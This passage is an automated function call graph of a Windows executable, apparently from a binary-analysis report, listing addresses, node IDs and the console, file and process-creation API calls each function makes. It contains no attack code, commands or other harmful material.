20276 7ff6a0e7c460 183 API calls 20276->20282 20299 7ff6a0e7c30b 20277->20299 20278->20283 20285 7ff6a0e7cd90 166 API calls 20281->20285 20282->20264 20282->20276 20283->20272 20283->20273 20290 7ff6a0e7c211 20283->20290 20284->20287 20285->20289 20286 7ff6a0e7c460 183 API calls 20286->20264 20287->20264 20288 7ff6a0e7c460 183 API calls 20287->20288 20288->20287 20289->20264 20289->20290 20291 7ff6a0e7c285 20289->20291 20295 7ff6a0e7d840 178 API calls 20289->20295 20292 7ff6a0e7ff70 2 API calls 20290->20292 20291->20290 20296 7ff6a0e7b6b0 170 API calls 20291->20296 20292->20264 20293 7ff6a0e7d840 178 API calls 20293->20299 20294 7ff6a0e7b6b0 170 API calls 20294->20283 20295->20289 20297 7ff6a0e7c2ac 20296->20297 20297->20287 20297->20290 20298 7ff6a0e7c3d4 20298->20287 20298->20290 20298->20294 20299->20264 20299->20290 20299->20293 20299->20298 20301 7ff6a0e7ca40 17 API calls 20300->20301 20317 7ff6a0e7b162 20301->20317 20302 7ff6a0e7b2f7 ??_V@YAXPEAX 20303 7ff6a0e7b303 20302->20303 20305 7ff6a0e88f80 7 API calls 20303->20305 20304 7ff6a0e81ea0 8 API calls 20304->20317 20308 7ff6a0e7b315 20305->20308 20306 7ff6a0e7b1d9 20307 7ff6a0e7cd90 166 API calls 20306->20307 20325 7ff6a0e7b1ed 20306->20325 20307->20325 20308->20164 20308->20175 20310 7ff6a0e7b2e1 20310->20302 20310->20303 20311 7ff6a0e7b228 _get_osfhandle 20313 7ff6a0e7b23f _get_osfhandle 20311->20313 20311->20325 20312 7ff6a0e8bfef _get_osfhandle SetFilePointer 20314 7ff6a0e8c01d 20312->20314 20312->20325 20313->20325 20316 7ff6a0e833f0 _vsnwprintf 20314->20316 20319 7ff6a0e8c038 20316->20319 20317->20304 20317->20306 20317->20310 20317->20317 20318 7ff6a0e801b8 6 API calls 20318->20325 20324 7ff6a0e73278 166 API calls 20319->20324 20320 7ff6a0e8c1c3 20321 7ff6a0e833f0 _vsnwprintf 20320->20321 20321->20319 20322 7ff6a0e7d208 _close 20322->20325 20323 7ff6a0e826e0 19 API calls 20323->20325 20327 7ff6a0e8c1f9 20324->20327 20325->20310 20325->20311 20325->20312 20325->20318 20325->20320 20325->20322 20325->20323 20326 7ff6a0e8c060 20325->20326 20328 7ff6a0e8c246 20325->20328 20329 7ff6a0e8c1a5 20325->20329 20331 7ff6a0e7b038 _dup2 20325->20331 20336 7ff6a0e7b356 20325->20336 20784 7ff6a0e7affc _dup 20325->20784 20786 7ff6a0e9f318 _get_osfhandle GetFileType 20325->20786 20326->20328 20332 7ff6a0e809f4 2 API calls 20326->20332 20330 7ff6a0e7af98 2 API calls 20327->20330 20333 7ff6a0e7af98 2 API calls 20328->20333 20334 7ff6a0e7b038 _dup2 20329->20334 20330->20310 20331->20325 20337 7ff6a0e8c084 20332->20337 20338 7ff6a0e8c24b 20333->20338 20335 7ff6a0e8c1b7 20334->20335 20339 7ff6a0e8c1be 20335->20339 20340 7ff6a0e8c207 20335->20340 20343 7ff6a0e7af98 2 API calls 20336->20343 20341 7ff6a0e7b900 166 API calls 20337->20341 20342 7ff6a0e9f1d8 166 API calls 20338->20342 20344 7ff6a0e7d208 _close 20339->20344 20346 7ff6a0e7d208 _close 20340->20346 20345 7ff6a0e8c08c 20341->20345 20342->20310 20347 7ff6a0e8c211 20343->20347 20344->20320 20348 7ff6a0e8c094 wcsrchr 20345->20348 20358 7ff6a0e8c0ad 20345->20358 20346->20336 20349 7ff6a0e833f0 _vsnwprintf 20347->20349 20348->20358 20350 7ff6a0e8c22c 20349->20350 20351 7ff6a0e73278 166 API calls 20350->20351 20351->20310 20352 7ff6a0e8c106 20353 7ff6a0e7ff70 2 API calls 20352->20353 20355 7ff6a0e8c13b 20353->20355 20354 7ff6a0e8c0e0 _wcsnicmp 20354->20358 20355->20328 20356 7ff6a0e8c146 SearchPathW 20355->20356 20356->20328 20357 7ff6a0e8c188 20356->20357 20359 7ff6a0e826e0 19 API calls 20357->20359 20358->20352 20358->20354 20359->20329 20361 7ff6a0e81ea0 8 API calls 20360->20361 20362 7ff6a0e80ab9 20361->20362 20363 7ff6a0e80b12 memset 20362->20363 20364 7ff6a0e8d927 20362->20364 20365 7ff6a0e80aee _wcsnicmp 20362->20365 20371 7ff6a0e8128f ??_V@YAXPEAX 20362->20371 20366 7ff6a0e7ca40 17 API calls 20363->20366 20368 7ff6a0e8081c 166 API calls 20364->20368 20365->20363 20365->20364 20367 7ff6a0e80b5a 20366->20367 20370 7ff6a0e7b364 17 API calls 20367->20370 20381 7ff6a0e8d94e 20367->20381 20369 7ff6a0e8d933 20368->20369 20369->20363 20369->20371 20395 7ff6a0e80b6f 20370->20395 20372 7ff6a0e8d96b ??_V@YAXPEAX 20372->20381 20373 7ff6a0e80b8c wcschr 20373->20395 20375 7ff6a0e83bac wcschr 20375->20395 20376 7ff6a0e8d99a wcschr 20376->20381 20377 7ff6a0e80c0f wcsrchr 20377->20381 20377->20395 20378 7ff6a0e8d9ca GetFileAttributesW 20378->20381 20399 7ff6a0e8da64 20378->20399 20379 7ff6a0e8da74 20380 7ff6a0e8da90 GetFileAttributesW 20379->20380 20379->20399 20380->20381 20382 7ff6a0e8daa8 GetLastError 20380->20382 20381->20372 20381->20376 20381->20378 20383 7ff6a0e8d9fd ??_V@YAXPEAX 20381->20383 20381->20399 20384 7ff6a0e8dab9 20382->20384 20382->20399 20383->20381 20384->20381 20385 7ff6a0e7cd90 166 API calls 20385->20395 20386 7ff6a0e83060 171 API calls 20386->20395 20387 7ff6a0e8081c 166 API calls 20387->20395 20388 7ff6a0e7d3f0 223 API calls 20388->20395 20389 7ff6a0e81ea0 8 API calls 20389->20395 20390 7ff6a0e7af74 170 API calls 20390->20395 20391 7ff6a0e80d71 wcsrchr 20392 7ff6a0e80d97 NeedCurrentDirectoryForExePathW 20391->20392 20391->20395 20392->20381 20392->20395 20394 7ff6a0e80fb1 wcsrchr 20394->20395 20396 7ff6a0e80fd0 wcschr 20394->20396 20395->20371 20395->20373 20395->20375 20395->20377 20395->20379 20395->20381 20395->20385 20395->20386 20395->20387 20395->20388 20395->20389 20395->20390 20395->20391 20395->20394 20395->20396 20397 7ff6a0e82eb4 22 API calls 20395->20397 20401 7ff6a0e810fd wcsrchr 20395->20401 20410 7ff6a0e81087 _wcsicmp 20395->20410 20787 7ff6a0e8291c GetDriveTypeW 20395->20787 20790 7ff6a0e82efc 20395->20790 20398 7ff6a0e80fed wcschr 20396->20398 20396->20399 20397->20395 20398->20395 20398->20399 20401->20395 20402 7ff6a0e8111a _wcsicmp 20401->20402 20403 7ff6a0e8123d 20402->20403 20404 7ff6a0e81138 _wcsicmp 20402->20404 20406 7ff6a0e81175 20403->20406 20407 7ff6a0e81250 ??_V@YAXPEAX 20403->20407 20404->20403 20405 7ff6a0e810c5 20404->20405 20405->20406 20408 7ff6a0e81169 ??_V@YAXPEAX 20405->20408 20409 7ff6a0e88f80 7 API calls 20406->20409 20407->20406 20408->20406 20411 7ff6a0e81189 20409->20411 20410->20379 20412 7ff6a0e810a7 _wcsicmp 20410->20412 20411->20174 20412->20379 20412->20405 20414 7ff6a0e77279 20413->20414 20415 7ff6a0e77211 _setjmp 20413->20415 20414->20179 20415->20414 20417 7ff6a0e77265 20415->20417 20804 7ff6a0e772b0 20417->20804 20420 7ff6a0e7cb63 20419->20420 20421 7ff6a0e7cd90 166 API calls 20420->20421 20422 7ff6a0e7c848 20421->20422 20422->20204 20423 7ff6a0e7cad4 20422->20423 20424 7ff6a0e7cad9 20423->20424 20432 7ff6a0e7cb05 20423->20432 20425 7ff6a0e7cd90 166 API calls 20424->20425 20424->20432 20426 7ff6a0e8c722 20425->20426 20427 7ff6a0e8c72e GetConsoleTitleW 20426->20427 20426->20432 20428 7ff6a0e8c74a 20427->20428 20427->20432 20429 7ff6a0e7b6b0 170 API calls 20428->20429 20434 7ff6a0e8c778 20429->20434 20430 7ff6a0e8c7ec 20431 7ff6a0e7ff70 2 API calls 20430->20431 20431->20432 20432->20204 20433 7ff6a0e8c7dd SetConsoleTitleW 20433->20430 20434->20430 20434->20433 20436 7ff6a0e842ab UpdateProcThreadAttribute 20435->20436 20437 7ff6a0e8ecd4 GetLastError 20435->20437 20438 7ff6a0e8ecf0 GetLastError 20436->20438 20439 7ff6a0e842eb memset memset GetStartupInfoW 20436->20439 20440 7ff6a0e8ecee 20437->20440 20532 7ff6a0e99eec 20438->20532 20442 7ff6a0e83a90 170 API calls 20439->20442 20444 7ff6a0e843a8 20442->20444 20445 7ff6a0e7b900 166 API calls 20444->20445 20446 7ff6a0e843bb 20445->20446 20447 7ff6a0e843cc 20446->20447 20448 7ff6a0e84638 _local_unwind 20446->20448 20449 7ff6a0e843de wcsrchr 20447->20449 20456 7ff6a0e84415 20447->20456 20448->20447 20450 7ff6a0e843f7 lstrcmpW 20449->20450 20449->20456 20452 7ff6a0e84668 20450->20452 20450->20456 20520 7ff6a0e99044 20452->20520 20453 7ff6a0e8441a 20455 7ff6a0e8442a CreateProcessW 20453->20455 20458 7ff6a0e84596 CreateProcessAsUserW 20453->20458 20457 7ff6a0e8448b 20455->20457 20519 7ff6a0e85a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 20456->20519 20459 7ff6a0e84495 CloseHandle 20457->20459 20460 7ff6a0e84672 GetLastError 20457->20460 20458->20457 20461 7ff6a0e8498c 8 API calls 20459->20461 20474 7ff6a0e8468d 20460->20474 20462 7ff6a0e844c5 20461->20462 20466 7ff6a0e844cd 20462->20466 20462->20474 20463 7ff6a0e847a3 20463->20259 20464 7ff6a0e844f8 20464->20463 20465 7ff6a0e84612 20464->20465 20469 7ff6a0e85cb4 7 API calls 20464->20469 20470 7ff6a0e8461c 20465->20470 20472 7ff6a0e847e1 CloseHandle 20465->20472 20466->20463 20466->20464 20484 7ff6a0e9a250 33 API calls 20466->20484 20467 7ff6a0e7cd90 166 API calls 20468 7ff6a0e84724 20467->20468 20471 7ff6a0e8472c _local_unwind 20468->20471 20479 7ff6a0e8473d 20468->20479 20473 7ff6a0e84517 20469->20473 20475 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20470->20475 20471->20479 20472->20470 20476 7ff6a0e833f0 _vsnwprintf 20473->20476 20474->20466 20474->20467 20477 7ff6a0e847fa DeleteProcThreadAttributeList 20475->20477 20478 7ff6a0e84544 20476->20478 20480 7ff6a0e88f80 7 API calls 20477->20480 20481 7ff6a0e8498c 8 API calls 20478->20481 20485 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20479->20485 20482 7ff6a0e84820 20480->20482 20483 7ff6a0e84558 20481->20483 20482->20259 20486 7ff6a0e84564 20483->20486 20487 7ff6a0e847ae 20483->20487 20484->20464 20489 7ff6a0e8475b _local_unwind 20485->20489 20490 7ff6a0e8498c 8 API calls 20486->20490 20488 7ff6a0e833f0 _vsnwprintf 20487->20488 20488->20465 20489->20466 20491 7ff6a0e84577 20490->20491 20491->20470 20492 7ff6a0e8457f 20491->20492 20493 7ff6a0e9a920 210 API calls 20492->20493 20494 7ff6a0e84584 20493->20494 20494->20470 20512 7ff6a0e79737 20495->20512 20497 7ff6a0e7977d memset 20499 7ff6a0e7ca40 17 API calls 20497->20499 20498 7ff6a0e7cd90 166 API calls 20498->20512 20499->20512 20500 7ff6a0e8b76e 20503 7ff6a0e73278 166 API calls 20500->20503 20501 7ff6a0e8b7b3 20502 7ff6a0e8b79a 20505 7ff6a0e8855c ??_V@YAXPEAX 20502->20505 20506 7ff6a0e8b787 20503->20506 20504 7ff6a0e7b364 17 API calls 20504->20512 20505->20501 20507 7ff6a0e8b795 20506->20507 20622 7ff6a0e9e944 20506->20622 20630 7ff6a0e97694 20507->20630 20512->20497 20512->20498 20512->20500 20512->20501 20512->20502 20512->20504 20512->20512 20513 7ff6a0e7986d 20512->20513 20534 7ff6a0e81fac memset 20512->20534 20561 7ff6a0e7ce10 20512->20561 20611 7ff6a0e796b4 20512->20611 20616 7ff6a0e85920 20512->20616 20515 7ff6a0e7988c 20513->20515 20516 7ff6a0e79880 ??_V@YAXPEAX 20513->20516 20517 7ff6a0e88f80 7 API calls 20515->20517 20516->20515 20518 7ff6a0e7989d 20517->20518 20518->20259 20521 7ff6a0e83a90 170 API calls 20520->20521 20522 7ff6a0e99064 20521->20522 20523 7ff6a0e9906e 20522->20523 20524 7ff6a0e99083 20522->20524 20525 7ff6a0e8498c 8 API calls 20523->20525 20527 7ff6a0e7cd90 166 API calls 20524->20527 20526 7ff6a0e99081 20525->20526 20526->20456 20528 7ff6a0e9909b 20527->20528 20528->20526 20529 7ff6a0e8498c 8 API calls 20528->20529 20530 7ff6a0e990ec 20529->20530 20531 7ff6a0e7ff70 2 API calls 20530->20531 20531->20526 20533 7ff6a0e8ed0a DeleteProcThreadAttributeList 20532->20533 20533->20440 20535 7ff6a0e8203b 20534->20535 20536 7ff6a0e820b0 20535->20536 20537 7ff6a0e82094 20535->20537 20538 7ff6a0e83060 171 API calls 20536->20538 20540 7ff6a0e8211c 20536->20540 20539 7ff6a0e820a6 20537->20539 20541 7ff6a0e73278 166 API calls 20537->20541 20538->20540 20542 7ff6a0e88f80 7 API calls 20539->20542 20540->20539 20543 7ff6a0e82e44 2 API calls 20540->20543 20541->20539 20544 7ff6a0e82325 20542->20544 20545 7ff6a0e82148 20543->20545 20544->20512 20545->20539 20546 7ff6a0e82d70 3 API calls 20545->20546 20547 7ff6a0e821af 20546->20547 20548 7ff6a0e7b900 166 API calls 20547->20548 20550 7ff6a0e821d0 20548->20550 20549 7ff6a0e8e04a ??_V@YAXPEAX 20549->20539 20550->20549 20551 7ff6a0e8221c wcsspn 20550->20551 20560 7ff6a0e822a4 ??_V@YAXPEAX 20550->20560 20552 7ff6a0e7b900 166 API calls 20551->20552 20554 7ff6a0e8223b 20552->20554 20554->20549 20558 7ff6a0e82252 20554->20558 20555 7ff6a0e8228f 20556 7ff6a0e7d3f0 223 API calls 20555->20556 20556->20560 20557 7ff6a0e8e06d wcschr 20557->20558 20558->20555 20558->20557 20559 7ff6a0e8e090 towupper 20558->20559 20559->20555 20559->20558 20560->20539 20562 7ff6a0e7d0f8 20561->20562 20610 7ff6a0e7ce5b 20561->20610 20563 7ff6a0e88f80 7 API calls 20562->20563 20566 7ff6a0e7d10a 20563->20566 20564 7ff6a0e8c860 20565 7ff6a0e8c97c 20564->20565 20568 7ff6a0e9ee88 390 API calls 20564->20568 20569 7ff6a0e9e9b4 197 API calls 20565->20569 20566->20512 20570 7ff6a0e8c879 20568->20570 20571 7ff6a0e8c981 longjmp 20569->20571 20572 7ff6a0e8c882 EnterCriticalSection LeaveCriticalSection 20570->20572 20573 7ff6a0e8c95c 20570->20573 20574 7ff6a0e8c99a 20571->20574 20580 7ff6a0e7d0e3 20572->20580 20573->20565 20578 7ff6a0e796b4 186 API calls 20573->20578 20574->20562 20577 7ff6a0e8c9b3 ??_V@YAXPEAX 20574->20577 20575 7ff6a0e7cd90 166 API calls 20575->20610 20577->20562 20578->20573 20579 7ff6a0e7ceaa _tell 20581 7ff6a0e7d208 _close 20579->20581 20580->20512 20581->20610 20582 7ff6a0e8c9d5 20583 7ff6a0e9d610 167 API calls 20582->20583 20585 7ff6a0e8c9da 20583->20585 20584 7ff6a0e7b900 166 API calls 20584->20610 20586 7ff6a0e8ca07 20585->20586 20588 7ff6a0e9bfec 176 API calls 20585->20588 20587 7ff6a0e9e91c 198 API calls 20586->20587 20592 7ff6a0e8ca0c 20587->20592 20589 7ff6a0e8c9f1 20588->20589 20591 7ff6a0e73240 166 API calls 20589->20591 20590 7ff6a0e7cf33 memset 20590->20610 20591->20586 20592->20512 20593 7ff6a0e7ca40 17 API calls 20593->20610 20594 7ff6a0e7d184 wcschr 20594->20610 20595 7ff6a0e9bfec 176 API calls 20595->20610 20596 7ff6a0e8c9c9 20598 7ff6a0e8855c ??_V@YAXPEAX 20596->20598 20597 7ff6a0e7d1a7 wcschr 20597->20610 20598->20562 20600 7ff6a0e80a6c 273 API calls 20600->20610 20601 7ff6a0e7be00 635 API calls 20601->20610 20602 7ff6a0e83448 166 API calls 20602->20610 20603 7ff6a0e80580 12 API calls 20605 7ff6a0e7d003 GetConsoleOutputCP GetCPInfo 20603->20605 20604 7ff6a0e7cfab _wcsicmp 20604->20610 20606 7ff6a0e804f4 3 API calls 20605->20606 20606->20610 20608 7ff6a0e81fac 238 API calls 20608->20610 20609 7ff6a0e7d044 ??_V@YAXPEAX 20609->20610 20610->20562 20610->20564 20610->20574 20610->20575 20610->20580 20610->20582 20610->20584 20610->20590 20610->20593 20610->20594 20610->20595 20610->20596 20610->20597 20610->20600 20610->20601 20610->20602 20610->20603 20610->20604 20610->20608 20610->20609 20636 7ff6a0e80494 20610->20636 20649 7ff6a0e7df60 20610->20649 20669 7ff6a0e9778c 20610->20669 20700 7ff6a0e9c738 20610->20700 20612 7ff6a0e8b6e2 RevertToSelf CloseHandle 20611->20612 20613 7ff6a0e796c8 20611->20613 20614 7ff6a0e796ce 20613->20614 20615 7ff6a0e76a48 184 API calls 20613->20615 20614->20512 20615->20613 20617 7ff6a0e8596c 20616->20617 20621 7ff6a0e85a12 20616->20621 20618 7ff6a0e8598d VirtualQuery 20617->20618 20617->20621 20620 7ff6a0e859ad 20618->20620 20618->20621 20619 7ff6a0e859b7 VirtualQuery 20619->20620 20619->20621 20620->20619 20620->20621 20621->20512 20623 7ff6a0e9e990 20622->20623 20624 7ff6a0e9e954 20622->20624 20625 7ff6a0e9e9b4 197 API calls 20623->20625 20626 7ff6a0e9ee88 390 API calls 20624->20626 20627 7ff6a0e9e995 longjmp 20625->20627 20628 7ff6a0e9e964 20626->20628 20628->20623 20629 7ff6a0e796b4 186 API calls 20628->20629 20629->20628 20631 7ff6a0e976a3 20630->20631 20632 7ff6a0e976b7 20631->20632 20633 7ff6a0e796b4 186 API calls 20631->20633 20634 7ff6a0e9e9b4 197 API calls 20632->20634 20633->20631 20635 7ff6a0e976bc longjmp 20634->20635 20637 7ff6a0e804a4 20636->20637 20638 7ff6a0e826e0 19 API calls 20637->20638 20639 7ff6a0e804b9 _get_osfhandle SetFilePointer 20637->20639 20640 7ff6a0e8d845 20637->20640 20642 7ff6a0e8d839 20637->20642 20645 7ff6a0e73278 166 API calls 20637->20645 20638->20637 20639->20610 20641 7ff6a0e9f1d8 166 API calls 20640->20641 20644 7ff6a0e8d837 20641->20644 20643 7ff6a0e73278 166 API calls 20642->20643 20643->20644 20646 7ff6a0e8d819 _getch 20645->20646 20646->20637 20647 7ff6a0e8d832 20646->20647 20710 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 20647->20710 20650 7ff6a0e7df93 20649->20650 20651 7ff6a0e7dfe2 20649->20651 20650->20651 20652 7ff6a0e7df9f GetProcessHeap RtlFreeHeap 20650->20652 20653 7ff6a0e7e100 VirtualFree 20651->20653 20654 7ff6a0e7e00b _setjmp 20651->20654 20652->20650 20652->20651 20653->20651 20655 7ff6a0e7e04a 20654->20655 20656 7ff6a0e7e0c3 20654->20656 20657 7ff6a0e7e600 473 API calls 20655->20657 20656->20579 20658 7ff6a0e7e073 20657->20658 20659 7ff6a0e7e081 20658->20659 20660 7ff6a0e7e0e0 longjmp 20658->20660 20661 7ff6a0e7d250 475 API calls 20659->20661 20668 7ff6a0e7e0b0 20660->20668 20662 7ff6a0e7e086 20661->20662 20665 7ff6a0e7e600 473 API calls 20662->20665 20662->20668 20666 7ff6a0e7e0a7 20665->20666 20667 7ff6a0e9d610 167 API calls 20666->20667 20666->20668 20667->20668 20668->20656 20711 7ff6a0e9d3fc 20668->20711 20672 7ff6a0e977bc 20669->20672 20670 7ff6a0e97989 20693 7ff6a0e979ef 20670->20693 20763 7ff6a0e976e0 20670->20763 20671 7ff6a0e97aca 20675 7ff6a0e834a0 166 API calls 20671->20675 20672->20670 20672->20671 20673 7ff6a0e979c0 20672->20673 20676 7ff6a0e97984 20672->20676 20677 7ff6a0e97ab5 20672->20677 20681 7ff6a0e97a00 20672->20681 20684 7ff6a0e83448 166 API calls 20672->20684 20691 7ff6a0e9778c 166 API calls 20672->20691 20672->20693 20679 7ff6a0e834a0 166 API calls 20673->20679 20678 7ff6a0e97adb 20675->20678 20676->20670 20676->20673 20680 7ff6a0e83448 166 API calls 20677->20680 20682 7ff6a0e83448 166 API calls 20678->20682 20685 7ff6a0e97af0 20678->20685 20688 7ff6a0e979d6 20679->20688 20680->20693 20687 7ff6a0e97a0b 20681->20687 20681->20693 20698 7ff6a0e97a33 20681->20698 20682->20685 20683 7ff6a0e9778c 166 API calls 20686 7ff6a0e97afb 20683->20686 20684->20672 20685->20683 20686->20670 20694 7ff6a0e83448 166 API calls 20686->20694 20687->20693 20695 7ff6a0e834a0 166 API calls 20687->20695 20689 7ff6a0e979e7 20688->20689 20692 7ff6a0e83448 166 API calls 20688->20692 20759 7ff6a0e97730 20689->20759 20691->20672 20692->20689 20693->20610 20694->20670 20697 7ff6a0e97a23 20695->20697 20696 7ff6a0e83448 166 API calls 20696->20693 20699 7ff6a0e9778c 166 API calls 20697->20699 20698->20696 20699->20689 20701 7ff6a0e9c775 20700->20701 20702 7ff6a0e9c7ab 20700->20702 20703 7ff6a0e7cd90 166 API calls 20701->20703 20704 7ff6a0e9c781 20702->20704 20705 7ff6a0e9c8d4 20702->20705 20707 7ff6a0e7b6b0 170 API calls 20702->20707 20708 7ff6a0e7b038 _dup2 20702->20708 20709 7ff6a0e7d208 _close 20702->20709 20703->20704 20704->20705 20706 7ff6a0e7b0d8 194 API calls 20704->20706 20705->20610 20706->20705 20707->20702 20708->20702 20709->20702 20722 7ff6a0e9d419 20711->20722 20712 7ff6a0e8cadf 20713 7ff6a0e83448 166 API calls 20713->20722 20714 7ff6a0e9d592 20716 7ff6a0e83448 166 API calls 20714->20716 20715 7ff6a0e9d5c4 20717 7ff6a0e83448 166 API calls 20715->20717 20719 7ff6a0e9d5a5 20716->20719 20717->20712 20721 7ff6a0e9d5ba 20719->20721 20725 7ff6a0e83448 166 API calls 20719->20725 20720 7ff6a0e9d546 20720->20715 20723 7ff6a0e9d555 20720->20723 20729 7ff6a0e9d36c 20721->20729 20722->20712 20722->20713 20722->20714 20722->20715 20722->20723 20724 7ff6a0e9d541 20722->20724 20727 7ff6a0e9d3fc 166 API calls 20722->20727 20736 7ff6a0e9d31c 20723->20736 20724->20714 20724->20715 20724->20720 20728 7ff6a0e9d589 20724->20728 20725->20721 20727->20722 20728->20714 20728->20723 20730 7ff6a0e9d381 20729->20730 20731 7ff6a0e9d3d8 20729->20731 20732 7ff6a0e834a0 166 API calls 20730->20732 20734 7ff6a0e9d390 20732->20734 20733 7ff6a0e83448 166 API calls 20733->20734 20734->20731 20734->20733 20735 7ff6a0e834a0 166 API calls 20734->20735 20735->20734 20737 7ff6a0e83448 166 API calls 20736->20737 20738 7ff6a0e9d33b 20737->20738 20739 7ff6a0e9d36c 166 API calls 20738->20739 20740 7ff6a0e9d343 20739->20740 20741 7ff6a0e9d3fc 166 API calls 20740->20741 20758 7ff6a0e9d34e 20741->20758 20742 7ff6a0e9d5c2 20742->20712 20743 7ff6a0e83448 166 API calls 20743->20758 20744 7ff6a0e9d592 20746 7ff6a0e83448 166 API calls 20744->20746 20745 7ff6a0e9d5c4 20747 7ff6a0e83448 166 API calls 20745->20747 20749 7ff6a0e9d5a5 20746->20749 20747->20742 20748 7ff6a0e9d31c 166 API calls 20748->20742 20751 7ff6a0e9d5ba 20749->20751 20754 7ff6a0e83448 166 API calls 20749->20754 20750 7ff6a0e9d546 20750->20745 20752 7ff6a0e9d555 20750->20752 20755 7ff6a0e9d36c 166 API calls 20751->20755 20752->20748 20753 7ff6a0e9d541 20753->20744 20753->20745 20753->20750 20757 7ff6a0e9d589 20753->20757 20754->20751 20755->20742 20756 7ff6a0e9d3fc 166 API calls 20756->20758 20757->20744 20757->20752 20758->20742 20758->20743 20758->20744 20758->20745 20758->20752 20758->20753 20758->20756 20762 7ff6a0e9773c 20759->20762 20760 7ff6a0e9777d 20760->20693 20761 7ff6a0e83448 166 API calls 20761->20762 20762->20760 20762->20761 20764 7ff6a0e9778c 166 API calls 20763->20764 20765 7ff6a0e976fb 20764->20765 20766 7ff6a0e9771c 20765->20766 20767 7ff6a0e83448 166 API calls 20765->20767 20766->20693 20768 7ff6a0e97711 20767->20768 20769 7ff6a0e9778c 166 API calls 20768->20769 20769->20766 20771 7ff6a0e7c4c9 20770->20771 20772 7ff6a0e7c486 20770->20772 20775 7ff6a0e7ff70 2 API calls 20771->20775 20777 7ff6a0e7c161 20771->20777 20773 7ff6a0e7c48e wcschr 20772->20773 20772->20777 20774 7ff6a0e7c4ef 20773->20774 20773->20777 20776 7ff6a0e7cd90 166 API calls 20774->20776 20775->20777 20783 7ff6a0e7c4f9 20776->20783 20777->20264 20777->20286 20778 7ff6a0e7c541 20778->20777 20780 7ff6a0e7ff70 2 API calls 20778->20780 20779 7ff6a0e7d840 178 API calls 20779->20783 20780->20777 20781 7ff6a0e7b6b0 170 API calls 20781->20778 20782 7ff6a0e7c5bd 20782->20778 20782->20781 20783->20777 20783->20778 20783->20779 20783->20782 20785 7ff6a0e7b018 20784->20785 20785->20325 20786->20325 20788 7ff6a0e88f80 7 API calls 20787->20788 20789 7ff6a0e8296b 20788->20789 20789->20395 20791 7ff6a0e82f2a 20790->20791 20792 7ff6a0e82f97 20790->20792 20793 7ff6a0e8823c 10 API calls 20791->20793 20792->20791 20794 7ff6a0e82f9c wcschr 20792->20794 20796 7ff6a0e82f56 20793->20796 20795 7ff6a0e82fb6 wcschr 20794->20795 20802 7ff6a0e82f5a 20794->20802 20795->20791 20795->20802 20797 7ff6a0e83a0c 2 API calls 20796->20797 20796->20802 20798 7ff6a0e82fe0 20797->20798 20800 7ff6a0e82fe9 wcsrchr 20798->20800 20798->20802 20799 7ff6a0e88f80 7 API calls 20801 7ff6a0e82f83 20799->20801 20800->20802 20801->20395 20802->20799 20803 7ff6a0e8e4ec 20802->20803 20805 7ff6a0e94621 20804->20805 20806 7ff6a0e772de 20804->20806 20807 7ff6a0e947e0 20805->20807 20809 7ff6a0e9447b longjmp 20805->20809 20814 7ff6a0e94639 20805->20814 20821 7ff6a0e9475e 20805->20821 20808 7ff6a0e772eb 20806->20808 20812 7ff6a0e94530 20806->20812 20813 7ff6a0e94467 20806->20813 20810 7ff6a0e77348 168 API calls 20807->20810 20865 7ff6a0e77348 20808->20865 20815 7ff6a0e94492 20809->20815 20864 7ff6a0e94524 20810->20864 20820 7ff6a0e77348 168 API calls 20812->20820 20813->20808 20813->20815 20827 7ff6a0e94475 20813->20827 20817 7ff6a0e9463e 20814->20817 20818 7ff6a0e94695 20814->20818 20819 7ff6a0e77348 168 API calls 20815->20819 20817->20809 20838 7ff6a0e94654 20817->20838 20826 7ff6a0e773d4 168 API calls 20818->20826 20829 7ff6a0e944a8 20819->20829 20832 7ff6a0e94549 20820->20832 20828 7ff6a0e77348 168 API calls 20821->20828 20822 7ff6a0e77315 20880 7ff6a0e773d4 20822->20880 20823 7ff6a0e772b0 168 API calls 20830 7ff6a0e9480e 20823->20830 20824 7ff6a0e77348 168 API calls 20824->20822 20842 7ff6a0e9469a 20826->20842 20827->20809 20827->20818 20828->20807 20839 7ff6a0e944e2 20829->20839 20845 7ff6a0e77348 168 API calls 20829->20845 20830->20414 20831 7ff6a0e945b2 20833 7ff6a0e77348 168 API calls 20831->20833 20832->20831 20840 7ff6a0e9455e 20832->20840 20851 7ff6a0e77348 168 API calls 20832->20851 20837 7ff6a0e945c7 20833->20837 20834 7ff6a0e77348 168 API calls 20841 7ff6a0e77323 20834->20841 20835 7ff6a0e772b0 168 API calls 20847 7ff6a0e94738 20835->20847 20836 7ff6a0e946e1 20836->20835 20844 7ff6a0e77348 168 API calls 20837->20844 20838->20834 20846 7ff6a0e772b0 168 API calls 20839->20846 20840->20831 20843 7ff6a0e77348 168 API calls 20840->20843 20841->20414 20842->20836 20856 7ff6a0e946c7 20842->20856 20857 7ff6a0e946ea 20842->20857 20843->20831 20850 7ff6a0e945db 20844->20850 20845->20839 20848 7ff6a0e944f1 20846->20848 20849 7ff6a0e77348 168 API calls 20847->20849 20853 7ff6a0e772b0 168 API calls 20848->20853 20849->20864 20852 7ff6a0e77348 168 API calls 20850->20852 20851->20840 20854 7ff6a0e945ec 20852->20854 20855 7ff6a0e94503 20853->20855 20859 7ff6a0e77348 168 API calls 20854->20859 20855->20841 20861 7ff6a0e77348 168 API calls 20855->20861 20856->20836 20862 7ff6a0e77348 168 API calls 20856->20862 20858 7ff6a0e77348 168 API calls 20857->20858 20858->20836 20860 7ff6a0e94600 20859->20860 20863 7ff6a0e77348 168 API calls 20860->20863 20861->20864 20862->20836 20863->20864 20864->20823 20864->20841 20872 7ff6a0e7735d 20865->20872 20866 7ff6a0e73278 166 API calls 20867 7ff6a0e94820 longjmp 20866->20867 20868 7ff6a0e94838 20867->20868 20869 7ff6a0e73278 166 API calls 20868->20869 20870 7ff6a0e94844 longjmp 20869->20870 20871 7ff6a0e9485a 20870->20871 20873 7ff6a0e77348 166 API calls 20871->20873 20872->20866 20872->20868 20872->20872 20879 7ff6a0e773ab 20872->20879 20874 7ff6a0e9487b 20873->20874 20875 7ff6a0e77348 166 API calls 20874->20875 20876 7ff6a0e948ad 20875->20876 20877 7ff6a0e77348 166 API calls 20876->20877 20878 7ff6a0e772ff 20877->20878 20878->20822 20878->20824 20881 7ff6a0e9485a 20880->20881 20882 7ff6a0e77401 20880->20882 20883 7ff6a0e77348 168 API calls 20881->20883 20882->20841 20884 7ff6a0e9487b 20883->20884 20885 